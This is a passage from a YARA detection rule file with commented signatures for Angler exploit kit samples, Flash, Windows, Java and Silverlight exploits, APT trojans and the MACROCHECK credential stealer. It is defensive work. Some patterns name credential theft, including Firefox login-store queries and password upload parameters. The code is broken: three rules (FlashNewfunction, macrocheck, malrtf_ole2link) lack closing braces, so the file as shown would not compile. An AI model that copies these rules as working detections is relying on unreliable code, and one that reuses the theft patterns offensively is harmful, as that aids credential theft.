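      $string6 = "W\\Vr2a"
      $string7 = "META-INF/MANIFEST.MF"
      $string8 = "Na8$NS"
      $string9 = "_YJjB'"
   condition:
      // All but one of the 10 strings; no ZIP-magic or filesize gate.
      9 of them
   }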
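// YaraGenerator string-match rule for an Angler EK Flash sample; the byte
// runs below are sample-specific, not family-level indicators.
rule angler_flash2 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "23812c5a1d33c9ce61b0882f860d79d6"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = "4yOOUj"
      $string1 = "CSvI4e"
      $string2 = "'fwaEnkI"
      $string3 = "'y4m%X"
      $string4 = "eOc)a,"
      $string5 = "'0{Q5<"
      $string6 = "1BdX;P"
      $string7 = "D _J)C"
      $string8 = "-epZ.E"
      $string9 = "QpRkP."
      $string10 = "<o/]atel"
      $string11 = "@B.,X<"
      $string12 = "5r[c)U"
      $string13 = "52R7F'"
      $string14 = "NZ[FV'P"
   condition:
      // All but one of the 15 strings; no SWF-magic or filesize gate.
      14 of them
   }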
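// YaraGenerator string-match rule for an Angler EK landing page. The strings
// are 100-character slices of what reads as space-separated hex text embedded
// in the page, so the rule is tied to this one sample's encoded payload.
rule angler_html : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "afca949ab09c5583a2ea5b2006236666"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = " A9 3E AF D5 9AQ FA 14 BC F2 A0H EA 7FfJ A58 A3 B1 BD 85 DB F3 B4 B6 FB B2 B4 14 82 19 88 28 D0 EA 2"
      $string1 = " 2BS 25 26p 20 3F 81 0E D3 9C 84 C7 EC C3 C41M C48 D3 B5N 09 C2z 98 7B 09. DF 05 5EQ DF A3 B6 EE D5 "
      $string2 = "9 A1Fg A8 837 9A A9 0A 1D 40b02 A5U6 22o 16 DC 5D F5 F5 FA BE FB EDX F0 87 DB C9 7B D6 AC F6D 10 1AJ"
      $string3 = "24 AA 17 FB B0 96d DBN 05 EE F6 0F 24 D4 D0 C0 E4 96 03 A3 03 20/ 04 40 DB 8F 7FI A6 DC F5 09 0FWV 1"
      $string4 = "Fq B3 94 E3 3E EFw E6 AA9 3A 5B 9E2 D2 EC AF6 10c 83 0F DF BB FBx AF B4 1BV 5C DD F8 9BR 97v D0U 9EG"
      $string5 = "29 9B 01E C85 86 B0 09 EC E07 AFCY 19 E5 11 1C 92 E2 DA A9 5D 19P 3A BF AB D6 B3 3FZ B4 92 FF E1 27 "
      $string6 = "B A9 88 B8 F0 EBLd 8E 08 18 11P EE BFk 15 5BM D6 B7 CEh AF 9C 8F 04 89 88 5E F6 ED 13 8EN1p 86Vk BC "
      $string7 = "w F4 C8 16pV 22 0A BB EB 83 7D BC 89 B6 E06 8B 2A DC E6 7D CE. 0Dh 18 0A8 5E 60 0C BF A4 00M 00 E3 3"
      $string8 = "B7 C6 E3 8E DC 3BR 60L 94h D8 AA7k5s 0D 7Fb 8B 80P E0 1BP EBT B5 03zE D0o 2A B97 18 F39 7C 94 99 11 "
      $string9 = "kY 24 8E 3E 94 84 D2 00 1EB 16 A4 9C 28 24 C1B BB 22 7D 97c F5 BA AD C4 5C 23 5D 3D 5C A7d5 0C F6 EA"
      $string10 = "08 01 3A 15 3B E0 1A E2 89 5B A2 F4 ED 87O F9l A99 124 27 BF BB A1c 2BW 12Z 07 AA D9 81 B7 A6-5 E2 E"
      $string11 = " 16 BF A7 0E 00 16 BB 8FB CBn FC D8 9C C7 EA AC C2q 85n A96I D1 9B FC8 BDl B8 3Ajf 7B ADH FD 20 88 F"
      // $string12 is whitespace-padded "ML" and is far too generic on its own;
      // it only matters because the threshold needs 18 of 19.
      $string12 = "  ML    "
      $string13 = " AEJ 3B C7 BFy EF F07X D3 A0 1E B4q C4 BE 3A 10 E7 A0 FE D1Jhp 89 A0sj 1CW 08 D5 F7 C8 C6 D5I 81 D2 "
      $string14 = "B 24 90 ED CEP C8 C9 9B E5 25 09 C6B- 2B 3B C7 28 C9 C62 EB D3 D5 ED DE A8 7F A9mNs 87 12 82 03 A2 8"
      $string15 = "A 3A A2L DFa 18 11P 00 7F1 BBbY FA 5E 04 C4 5D 89 F3S DAN B5 CAi 8D 0A AC A8 0A ABI E6 1E 89 BB 07 D"
      $string16 = "C B5 FD 0B F9 0Ch CE 01 14 8Dp AF 24 E0 E3 D90 DD FF B0 07 2Ad 0B 7D B0 B2 D8 BD E6 A7 CE E1 E4 3E5 "
      $string17 = "19 0C 85 14r/ 8C F3 84 2B 8C CF 90 93 E2 F6zo C3 D40 A6 94 01 02Q 21G AB B9 CDx 9D FB 21 2C 10 C3 3C"
      $string18 = "FAV D7y A0 C7Ld4 01 22 EE B0 1EY FAB BA E0 01 24 15g C5 DA6 19 EEsl BF C7O 9F 8B E8 AF 93 F52 00 06 "
   condition:
      // All but one of the 19 strings; no file-type or filesize gate.
      18 of them
   }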
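// YaraGenerator string-match rule for an Angler EK landing-page script.
// The fragments preserve the sample's whitespace padding and randomised
// identifiers (Zydr$, DFOMIqka, PsKnARPQuNNZMP), so they are specific to this
// obfuscation pass. $string0 carries 2654435769 = 0x9E3779B9, the delta
// constant of TEA/XTEA, which suggests a TEA-style decoder in the page.
rule angler_js : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "482d6c24a824103f0bcd37fa59e19452"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = "    2654435769,   Be"
      $string1 = "DFOMIqka "
      $string2 = ",  Zydr$>>16"
      $string3 = "DFOMIqka( 'OPPj_phuPuiwzDFo')"
      $string4 = "U0BNJWZ9J0vM43TnlNZcWnZjZSelQZlb1HGTTllZTm19emc0dlsYF13GvhQJmTZmbVMxallMdhWW948YWi t    P  b50GW"
      $string5 = "    auSt;"
      $string6 = " eval    (NDbMFR "
      $string7 = "jWUwYDZhNVyMI2TzykEYjWk0MDM5MA%ZQ1TD1gEMzj         3  D       ',"
      $string8 = "('fE').substr    (2    ,    1 "
      $string9 = ",  -1 "
      $string10 = "    )  );Zydr$  [ 1]"
      $string11 = " 11;PsKnARPQuNNZMP<9;PsKnARPQuNNZMP"
      $string12 = "new   Array  (2),  Ykz"
      // "<script> " and ",  -1 " ($string13/$string9) are generic filler.
      $string13 = "<script> "
      $string14 = ");    CYxin "
      $string15 = "Zydr$    [    1]"
      $string16 = "var tKTGVbw,auSt, vnEihY, gftiUIdV, XnHs, UGlMHG, KWlqCKLfCV;"
      $string17 = "reXKyQsob1reXKyQsob3 "
   condition:
      // All but one of the 18 strings; no file-type or filesize gate.
      17 of them
   }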
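// YaraGenerator string-match rule for a second Angler EK landing page; as with
// angler_html the strings are slices of hex-looking text embedded in the page
// and identify this sample's payload encoding rather than the kit in general.
rule angler_html2 : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "6c926bf25d1a8a80ab988c8a34c0102e"
      sample_filetype = "js-html"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      $string0 = "E 06 E7i 1E 91q 9C D0J 1D 9B 14 E7g 1D DD ECK 20c 40 C6 0C AFR5 3D 03 9Em EC 0CB C9 A9 DFw C9 ADP 5B"
      $string1 = "14Bc 5C 3Bp CB 2A 12 3D A56 AA 14 87 E3 81 8A 80h 27 1C 3A4 CE 12 AE FAy F0 8A 21 B8I AD 1E B9 2C D1"
      $string2 = "0J 95 83 CC 1C 95D CAD 1A EA F3 00 E9 DA_ F2 ED 3CM1 A0 01t 1B EE 2C B6AWKq BF CAY FE D8 F2 7C 96 92"
      $string3 = "A8MTCsn C9 DBu D3 10 A0 D4 AC A9 97 06Rn 01 DAK EFFN ADP AE 0E 8FJd 8F DA B6 25RO 18 2A 00 EA F9 8B "
      $string4 = "A3 EB C1 CE 1E C4ok C4 19 F2 A7 17 9FCoz B6- C6 25J BB 0B 8C1OZ E4 7B AEz F6 06A 5D C0 D7 E8 FF DB D"
      $string5 = " 07 DE A3 F8 B0 B3 20V A4 B2 C8 60 BD EEG 95 BB 04 1Ckw A4 80 E6 23 F02 FA 9C 9A 14F BDC 18 BE BD B4"
      $string6 = "7 D1 B9 9B AC 2AN BA D3 00 A9 1CJ3J C0V 8F 8E FC B6p9 00 E1 01 21j B3 27 FF C3 8E 2B 92 8B DEiUI C3 "
      $string7 = " 99 2C AF9 F9 3F5 A8 F0 1BU C8e/ 00Q B4 10 DD BC 9D 8A BF B2 17 8F BFd DB D1 B7 E66 21 96 86 1E B2 1"
      $string8 = "E86 DF9 22Tg E93 9Em 29 0A 5B B5m E2 DCIF D6 D2 F5B CF F7XkRv BE EA A6 C5 82p 5E B3 B4aD B9 3A E0 22"
      $string9 = " 7C 95.q D6f E8 1AE 17 82T 84 F1/O 82 C2q C7 FE 05C E4 E5W F5 0A E4l 12 3Brt 8A E0 E7 DDJ 1F 1F C4 A"
      $string10 = "4t 91iE BD 2C 95U E9 1C AE 5B 5B A3 9D B2 F9 0B B5 15S9 AB 9D 94 85 A6 F1 AF B6 FC CAt 91iE BD 2C 95"
      // Generic closing tag; contributes nothing beyond the count.
      $string11 = "  </input>"
      $string12 = "2 D12 93 FD AB 0DKK AEN 40 DA 88 7B FA 3B 18 EE 09 92 ED AF A8b 07 002 0A A3S 04 29 F9 A3 EA BB E9 7"
      $string13 = "40 C6 0C AFR5E 15 07 EE CBg B3 C6 60G 92tFt D7E 7D F0 C4 A89 29 EC BA E1 D9 3D 23 F0 0B E0o 3E2c B3 "
      $string14 = "2 A3. A3 F1 D8 D4 A83K 9C AEu FF EA 02 F4 B8 A0 EE C9 7B 15 C1 07D 80 7C 10 864 96 E3 AA F8 99bgve D"
      $string15 = "C 7D DC 0A E9 0D A1k 85s 9D 24 8C D0k E1 7E 3AH E2 052 D8q 16 FC 96 0AR C0 EC 99K4 3F BE ED CC DBE A"
      $string16 = "40 DA 88 7B 9E 1A B3 FA DE 90U 5B BD6x 9A 0C 163 AB EA ED B4 B5 98 ADL B7 06 EE E5y B8 9B C9Q 00 E9 "
      $string17 = "F BF_ F9 AC 5B CC 0B1 7B 60 20c 40 C6 0C AFR5 0B C7D 09 9D E30 14 AC 027 B2 B9B A7 06 E3z DC- B2 60 "
      $string18 = "0 80 97Oi 8C 85 D2 1Bp CDv 11 05 D4 26 E7 FC 3DlO AE 96 D2 1B 89 7C 16H 11 86 D0 A6 B95 FC 01 C5 8E "
   condition:
      // All but one of the 19 strings; no file-type or filesize gate.
      18 of them
   }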
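// YaraGenerator string-match rule for a decompressed Angler EK SWF. Because
// the sample was uncompressed, ActionScript identifiers are visible and the
// strings are more meaningful than in the other angler_flash* rules.
rule angler_flash_uncompressed : EK
   {
   meta:
      author = "Josh Berry"
      date = "2016-06-26"
      description = "Angler Exploit Kit Detection"
      hash0 = "2543855d992b2f9a576f974c2630d851"
      sample_filetype = "unknown"
      yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
   strings:
      // Standard flash.display / flash.events class names appear in most SWFs;
      // the "_e_-..." family of identifiers and "Xtime2"/"ZviJbf" are the
      // sample-specific part. $string12 reads like a padding-check error from
      // an embedded crypto routine.
      $string0 = "DisplayObjectContainer"
      $string1 = "Xtime2"
      $string2 = "(HMRTQ"
      $string3 = "flash.events:EventDispatcher$flash.display:DisplayObjectContainer"
      $string4 = "_e_-___-__"
      $string5 = "ZviJbf"
      $string6 = "random-"
      $string7 = "_e_-_-_-_"
      $string8 = "_e_------"
      $string9 = "817677162"
      $string10 = "_e_-__-"
      $string11 = "-[vNnZZ"
      $string12 = "5:unpad: Invalid padding value. expected ["
      $string13 = "writeByte/"
      $string14 = "enumerateFonts"
      $string15 = "_e_---___"
      $string16 = "_e_-_-"
      $string17 = "f(fOJ4"
   condition:
      // All but one of the 18 strings; no SWF-magic or filesize gate, and a
      // compressed (CWS/ZWS) copy of the same file will not expose these strings.
      17 of them
   }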
// https://otx.alienvault.com/pulse/58239a2b4dc3d210c9784e20
// https://otx.alienvault.com/pulse/594c18574797aa0bf989b440
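// Detects Flash exploit samples for CVE-2015-5119 by build-time artefacts
// (project/class names and a left-over developer message) in the SWF body.
rule Flash_CVE_2015_5119_APT3 : Exploit {
       meta:
           description = "Exploit Sample CVE-2015-5119"
           author = "Florian Roth"
           score = 70
           date = "2015-08-01"
       strings:
           $s0 = "HT_exploit" fullword ascii
           $s1 = "HT_Exploit" fullword ascii
           $s2 = "flash_exploit_" ascii
           $s3 = "exp1_fla/MainTimeline" ascii fullword
           $s4 = "exp2_fla/MainTimeline" ascii fullword
           $s5 = "_shellcode_32" fullword ascii
           $s6 = "todo: unknown 32-bit target" fullword ascii
       condition:
           // 0x5746 little-endian is the bytes "FW", i.e. an uncompressed "FWS"
           // SWF header; compressed CWS/ZWS files are not covered by this gate.
           uint16(0) == 0x5746 and 1 of them
}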
// https://otx.alienvault.com/pulse/574283870353fb0131f05259
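// TidePool (Ke3chang) backdoor: multipart upload markers and the IEHelper
// drop path for its mshtml.dll decoy. hash5 in the original duplicated hash1
// and has been removed.
rule TidePool_Malware
   {

       meta:
           description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
           author = "Florian Roth"
           reference = "http://goo.gl/m2CXWR"
           date = "2016-05-24"
           hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
           hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
           hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
           hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"

       strings:
           // $x* are high-confidence (sample-specific paths / form field);
           // $s* are supporting strings that also occur in benign software.
           $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
           $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
           $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
           $x4 = "IEComDll.dat" fullword ascii
           $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
           $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
           $s3 = "network.proxy.socks_port\", " fullword ascii

       condition:
           // Either a small PE with one strong indicator, or 4 of the 7 strings
           // regardless of file type (the second branch has no MZ/size gate).
           ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) ) ) or ( 4 of them )
   }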
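// "http.exe" trojan from the referenced APT report: form-data exfil header,
// wordpade.exe persistence path, pipe-delimited log format and Firefox
// credential-store access (moz_logins / profiles.ini).
rule Mal_http_EXE : Trojan {
   	meta:
   		description = "Detects trojan from APT report named http.exe"
   		author = "Florian Roth"
   		reference = "https://goo.gl/13Wgy1"
   		date = "2016-05-25"
   		score = 80
   		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
   	strings:
   		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
   		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
   		$x3 = "\\dumps.dat" fullword ascii
   		$x4 = "\\wordpade.exe" fullword ascii
   		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii
   		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii
   		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
   		// Base64-encoded blob; the decoded form in the original annotation was
   		// not printable and has been dropped rather than reproduced garbled.
   		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii

   		$s1 = "SELECT * FROM moz_logins;" fullword ascii
   		$s2 = "makescr.dat" fullword ascii
   		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
   		$s4 = "?moz-proxy://" fullword ascii
   		$s5 = "[%s-%s] Title: %s" fullword ascii
   		// Literal SQLite error text ("foreign key mismatch ...") with a leading
   		// "C" byte; matched as-is.
   		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
   		$s7 = "Windows 95 SR2" fullword ascii
   		$s8 = "\\|%s|0|0|" fullword ascii
   	condition:
   		// PE under 2 MB with 1 strong + 2 supporting strings, or 3 strong
   		// strings in any file.
   		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) and 2 of ($s*) ) ) or ( 3 of ($x*) )
}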
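// Dropper extracted from a CAB in the referenced article; both literals must
// be present in a PE under 1 MB.
rule Mal_Dropper_httpEXE_from_CAB : Dropper {
   	meta:
   		description = "Detects a dropper from a CAB file mentioned in the article"
   		author = "Florian Roth"
   		reference = "https://goo.gl/13Wgy1"
   		date = "2016-05-25"
   		score = 60
   		hash1 = "9e7e5f70c4b32a4d5e8c798c26671843e76bb4bd5967056a822e982ed36e047b"
   	strings:
   		$s1 = "029.Hdl" fullword ascii
   		$s2 = "http.exe" fullword ascii
   	condition:
   		( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) )
}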
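// Malicious PotPlayer.dll (side-loaded): identified by its PDB path, or by the
// DLL name together with its "\update.dat" artefact.
rule Mal_PotPlayer_DLL : dll {
   	meta:
   		description = "Detects a malicious PotPlayer.dll"
   		author = "Florian Roth"
   		reference = "https://goo.gl/13Wgy1"
   		date = "2016-05-25"
   		score = 70
   		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
   	strings:
   		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii

   		$s3 = "PotPlayer.dll" fullword ascii
   		$s4 = "\\update.dat" fullword ascii
   	condition:
   		// Parenthesised to make the existing precedence explicit ("and" binds
   		// tighter than "or"): the MZ and filesize gates cover only the $x1
   		// branch, while "all of ($s*)" fires on any file holding both generic
   		// strings. Confirm whether the gates were meant to apply to both
   		// branches before tightening; behaviour is unchanged here.
   		( uint16(0) == 0x5a4d and filesize < 200KB and $x1 ) or all of ($s*)
}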
// https://otx.alienvault.com/pulse/55eedc264637f26df8742a70
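// Generic signature for MS15-077 / MS15-078 (ATMFD font driver) exploits:
// font-loading and GDI API names alongside "atmfd.dll", or a set of opcode
// fragments shared by the listed samples.
rule Exploit_MS15_077_078: Exploit {
   	meta:
   		description = "MS15-078 / MS15-077 exploit - generic signature"
   		author = "Florian Roth"
   		reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
   		date = "2015-07-21"
   		hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
   		hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
   		hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
   		hash4 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
   	strings:
   		// Individually common imports; the combination is what is unusual.
   		$s1 = "GDI32.DLL" fullword ascii
   		$s2 = "atmfd.dll" fullword wide
   		$s3 = "AddFontMemResourceEx" fullword ascii
   		$s4 = "NamedEscape" fullword ascii
   		$s5 = "CreateBitmap" fullword ascii
   		$s6 = "DeleteObject" fullword ascii

   		$op0 = { 83 45 e8 01 eb 07 c7 45 e8 } /* Opcode */
   		$op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 } /* Opcode */
   		$op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 } /* Opcode */
   		$op3 = { 64 00 88 ff 84 03 70 03 } /* Opcode */
   	condition:
   		// Parenthesised to make the existing precedence explicit: the MZ and
   		// filesize gates apply to the $s* branch only; the opcode branch
   		// matches in any file. Behaviour is unchanged.
   		( uint16(0) == 0x5a4d and filesize < 2000KB and all of ($s*) ) or all of ($op*)
}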
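// MS15-077 / MS15-078 exploit, Hacking Team code base: CI.dll paths, a fixed
// Chrome 36 User-Agent and a debug message. All six strings are required.
rule Exploit_MS15_077_078_HackingTeam: Exploit {
   	meta:
   		description = "MS15-078 / MS15-077 exploit - Hacking Team code"
   		author = "Florian Roth"
   		date = "2015-07-21"
   		super_rule = 1
   		hash1 = "ad6bb982a1ecfe080baf0a2b27950f989c107949b1cf02b6e0907f1a568ece15"
   		hash2 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
   	strings:
   		$s1 = "\\SystemRoot\\system32\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */
   		$s2 = "\\sysnative\\CI.dll" fullword ascii /* PEStudio Blacklist: strings */
   		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" fullword ascii /* PEStudio Blacklist: strings */
   		$s4 = "CRTDLL.DLL" fullword ascii
   		$s5 = "\\sysnative" fullword ascii /* PEStudio Blacklist: strings */
   		$s6 = "InternetOpenA coolio, trying open %s" fullword ascii
   	condition:
   		uint16(0) == 0x5a4d and filesize < 2500KB and all of them
}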
// https://otx.alienvault.com/pulse/5808d0bd10ce3f0203e82ef2
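// Compiled CVE-2015-1701 (win32k) exploit: user-mode API names plus the
// kernel symbols gSharedInfo / PsLookupProcessByProcessId in a small PE.
// The hash1..hash5 values are 40-hex (SHA-1) digests, unlike the SHA-256
// values used by the neighbouring rules.
rule CVE_2015_1701_Taihou {
   	meta:
   		description = "CVE-2015-1701 compiled exploit code"
   		author = "Florian Roth"
   		reference = "http://goo.gl/W4nU0q"
   		date = "2015-05-13"
   		hash1 = "90d17ebd75ce7ff4f15b2df951572653efe2ea17"
   		hash2 = "acf181d6c2c43356e92d4ee7592700fa01e30ffb"
   		hash3 = "b8aabe12502f7d55ae332905acee80a10e3bc399"
   		hash4 = "d9989a46d590ebc792f14aa6fec30560dfe931b1"
   		hash5 = "63d1d33e7418daf200dc4660fc9a59492ddd50d9"
   		score = 70
   	strings:
   		// $s4/$s5 carry no "fullword", so they also match inside longer names
   		// such as RegisterClassExW / LoadIconW.
   		$s3 = "VirtualProtect" fullword
   		$s4 = "RegisterClass"
   		$s5 = "LoadIcon"
   		$s6 = "PsLookupProcessByProcessId" fullword ascii
   		$s7 = "LoadLibraryExA" fullword ascii
   		$s8 = "gSharedInfo" fullword

   		$w1 = "user32.dll" wide
   		$w2 = "ntdll" wide
   	condition:
   		uint16(0) == 0x5a4d and filesize < 160KB and all of ($s*) and 1 of ($w*)
}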
// https://otx.alienvault.com/pulse/595f8c5c880ffa2a06bbb8ec
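// Java applet exploiting CVE-2013-0422 (JMX MBeanServer / MethodHandle
// sandbox escape): internal JMX class paths plus the reflection helpers.
rule CVE_2013_0422
   {
           meta:
                   description = "Java Applet JMX Remote Code Execution"
                   cve = "CVE-2013-0422"
                   ref = "http://pastebin.com/JVedyrCe"
                   author = "adnan.shukor@gmail.com"
                   date = "12-Jan-2013"
                   version = "1"
                   impact = 4
                   hide = false
           strings:
                   $0422_1 = "com/sun/jmx/mbeanserver/JmxMBeanServer" fullword
                   $0422_2 = "com/sun/jmx/mbeanserver/JmxMBeanServerBuilder" fullword
                   $0422_3 = "com/sun/jmx/mbeanserver/MBeanInstantiator" fullword
                   $0422_4 = "findClass" fullword
                   $0422_5 = "publicLookup" fullword
                   // Rhino script-engine classes used by some variants.
                   $class = /sun\.org\.mozilla\.javascript\.internal\.(Context|GeneratedClassLoader)/ fullword
           condition:
                   // "all of them" is implied by "all of ($0422_*)" and never adds a
                   // match; it is kept only so that $class is referenced (YARA
                   // rejects a rule that declares a string it never uses).
                   (all of ($0422_*)) or (all of them)
   }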
// https://otx.alienvault.com/pulse/54f7475713432a7ab3105f1a
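// Silverlight CVE-2013-0074 exploit (Win32 EXE per the meta): debug strings
// from the exploit's payload staging. Any two of the four strings suffice.
rule cve_2013_0074
   {
   meta:
   	author = "Kaspersky Lab"
   	filetype = "Win32 EXE"
   	date = "2015-07-23"
   	version = "1.0"

   strings:
   	$b2="Can't find Payload() address" ascii wide
   	$b3="/SilverApp1;component/App.xaml" ascii wide
   	$b4="Can't allocate ums after buf[]" ascii wide
   	// $b5 has no modifiers and therefore matches ASCII only, unlike $b2-$b4.
   	$b5="------------ START ------------"

   condition:
   	// Redundant nesting "( (2 of ($b*)) )" removed; behaviour is identical.
   	2 of ($b*)
   }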
// https://otx.alienvault.com/pulse/5544c0d3b45ff53b128efa6b
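// PDF with an embedded Flash object (CVE-2010-1297, the "newfunction" bug)
// plus JavaScript that unescapes %uXXXX-encoded shellcode. The rule expects
// the decoded PDF (tag decodedPDF), i.e. streams already inflated.
//
// Fix: the meta section declared "ref" twice (CVE id and URL). Tools that
// expose meta as a key/value map (e.g. yara-python) keep only one of the two,
// so the CVE id now lives under "cve", matching the CVE_2013_0422 rule in this
// file.
rule FlashNewfunction: decodedPDF
   {
      meta:
         cve = "CVE-2010-1297"
         hide = true
         impact = 5
         ref = "http://blog.xanda.org/tag/jsunpack/"
      strings:
         // JavaScript decoding of the shellcode
         $unescape = "unescape" fullword nocase
         // one %uXXXX unit, and a run of five of them
         $shellcode = /%u[A-Fa-f0-9]{4}/
         $shellcode5 = /(%u[A-Fa-f0-9]{4}){5}/
         // embedded Flash stream
         $cve20101297 = /\/Subtype ?\/Flash/
      condition:
         // either the unescape() call with at least one %u unit, or a
         // five-unit run (the latter does not require "unescape")
         ($unescape and $shellcode and $cve20101297) or ($shellcode5 and $cve20101297)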
// https://otx.alienvault.com/pulse/547cb9c811d4083bc021c392
// MACROCHECK credential stealer embedded in Office documents (FIN4). Works on
// .doc files and on VBA extracted from .docx (vbaProject.bin).
rule macrocheck : maldoc
{
    meta:
        Author      = "Fireeye Labs"
        Date        = "2014/11/30"
        Description = "Identify office documents with the MACROCHECK credential stealer in them.  It can be run against .doc files or VBA macros extraced from .docx files (vbaProject.bin files)."
        Reference   = "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html"

    strings:
        // form parameter names (password / message / username) - presumably
        // the upload of captured credentials
        $PARAMpword = "pword=" ascii wide
        $PARAMmsg   = "msg=" ascii wide
        $PARAMuname = "uname=" ascii           // ascii only in the original signature
        // fake login dialog
        $userform      = "UserForm" ascii wide
        $userloginform = "UserLoginForm" ascii wide
        $invalid       = "Invalid username or password" ascii wide
        // upload routine names
        $up1 = "uploadPOST" ascii wide
        $up2 = "postUpload" ascii wide

    condition:
        // either all three parameter names, or a dialog marker together
        // with one of the upload routines
        all of ($PARAM*)
        or (
            ($invalid or $userloginform or $userform)
            and ($up1 or $up2)
        )
// https://otx.alienvault.com/pulse/58ed1ab5626aa6187252f3b6
// Weaponized RTF carrying an OLE2Link object whose embedded compound document
// points at a remote http/https/ftp URL. All object data in RTF is written as
// hex digits, so every marker below is a hex string.
rule malrtf_ole2link : exploit
   {
   	meta:
   		author = "@h3x2b <tracker _AT h3x.eu>"
   		description = "Detect weaponized RTF documents with OLE2Link exploit"

   	strings:
   		//normal rtf beginning
   		$rtf_format_00 = "{\\rtf1"
   		//malformed rtf can have for example {\\rtA1
   		//(this prefix also covers $rtf_format_00, so "any of ($rtf_format_*)"
   		// is effectively just $rtf_format_01)
   		$rtf_format_01 = "{\\rt"

   		//having objdata structure
   		$rtf_olelink_01 = "\\objdata" nocase

   		//hex encoded ascii "OLE2Link" (4f 4c 45 32 4c 69 6e 6b)
   		$rtf_olelink_02 = "4f4c45324c696e6b" nocase

   		//hex encoded docfile magic - OLE compound file header (d0 cf 11 e0 a1 b1 1a e1)
   		$rtf_olelink_03 = "d0cf11e0a1b11ae1" nocase

   		//hex encoded UTF-16LE "http://" (68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00)
   		$rtf_payload_01 = "68007400740070003a002f002f00" nocase

   		//hex encoded UTF-16LE "https://"
   		$rtf_payload_02 = "680074007400700073003a002f002f00" nocase

   		//hex encoded UTF-16LE "ftp://"
   		$rtf_payload_03 = "6600740070003a002f002f00" nocase


   	condition:
   		//new_file and
   		//RTF header, every OLE2Link marker, and at least one URL scheme
   		any of ($rtf_format_*)
   		and all of ($rtf_olelink_*)
   		and any of ($rtf_payload_*)
// https://otx.alienvault.com/pulse/58c91f28bfefb5577afba777
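// Upatre downloader (sample hazgurut.exe and relatives). Matches a PE under
// 1.5 MB that has "barcod" near the start of the file plus a fixed set of
// DLL names and a requireAdministrator manifest fragment.
//
// Fix: the original declared "glmf32.dll" twice ($s2 and $s6). Because the
// two were identical, "all of ($s*)" was satisfied by the same bytes for both,
// so dropping $s6 leaves the matching logic unchanged and removes the
// duplicate from match output.
rule Upatre_Hazgurut {
   	meta:
   		description = "Detects Upatre malware - file hazgurut.exe"
   		author = "Florian Roth"
   		reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
   		date = "2015-10-13"
   		score = 70
   		hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
   		hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
   		hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
   		hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
   		hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
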